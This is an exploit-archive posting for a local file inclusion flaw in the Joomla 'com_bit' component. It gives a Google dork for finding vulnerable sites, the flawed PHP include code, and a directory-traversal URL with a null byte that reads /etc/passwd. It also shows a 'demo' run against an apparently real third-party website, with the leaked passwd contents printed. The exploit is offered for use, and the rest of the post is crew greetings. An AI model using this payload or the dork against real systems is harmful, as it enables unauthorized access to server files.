Joomla Bit Local File Inclusion

Joomla Bit Local File Inclusion: Posted Dec 19, 2012; Authored by Xr0b0t; Joomla Bit component suffers from a local file inclusion vulnerability.; tags | exploit, local, file inclusion; SHA-256 | 56a0dfe953eb01f7814c7e0a38f7af1db46be7d121833068fc3e03448164fbd5; Download | Favorite | View

Joomla Bit Local File Inclusion

[!]===========================================================================[!]

[~] Joomla Component bit LFI Vulnerability 
[~] Author : Xr0b0t (xrt@gmx.us)
[~] Homepage : http://www.indonesiancoder.com | http://Xr0b0t.name | http://mc-crew.info
[~] Date : 19 Des, 2012

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : JomLand.com
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"com_bit " ;)
[+] Version : N/A

[!]===========================================================================[!]

[ Vulnerable File ]
    http://127.0.0.1//index.php?option=com_bit&controller=[r0b0t]

[ Code PHP ]

  require_once (JPATH_COMPONENT.DS.'controller.php');

// Require specific controller if requested
if($controller = JRequest::getVar('controller')) {
    require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php'); 


[ XpL ]

    http://127.0.0.1//index.php?option=com_bit&controller=../../../../../../../../../../../../../../../etc/passwd%00




[ d3m0 ]

    http://websitekiemxx.com/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] kaMtiEz Ndang Rene...
[+] INDONESIAN CODER TEAM IndonesianHacker Malang CYber CREW Magelang Cyber
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,Yur4kha,Geni212


[ NOTE ]

[+] r0b0t familly never die !! 



[ QUOTE ]

[+] INDONESIANCODER still r0x...
[+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat ..
[+] Malang Cyber Crew & Magelang Cyber Community

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Joomla Bit Local File Inclusion

Joomla Bit Local File Inclusion

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Bit Local File Inclusion

Share This

Joomla Bit Local File Inclusion

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems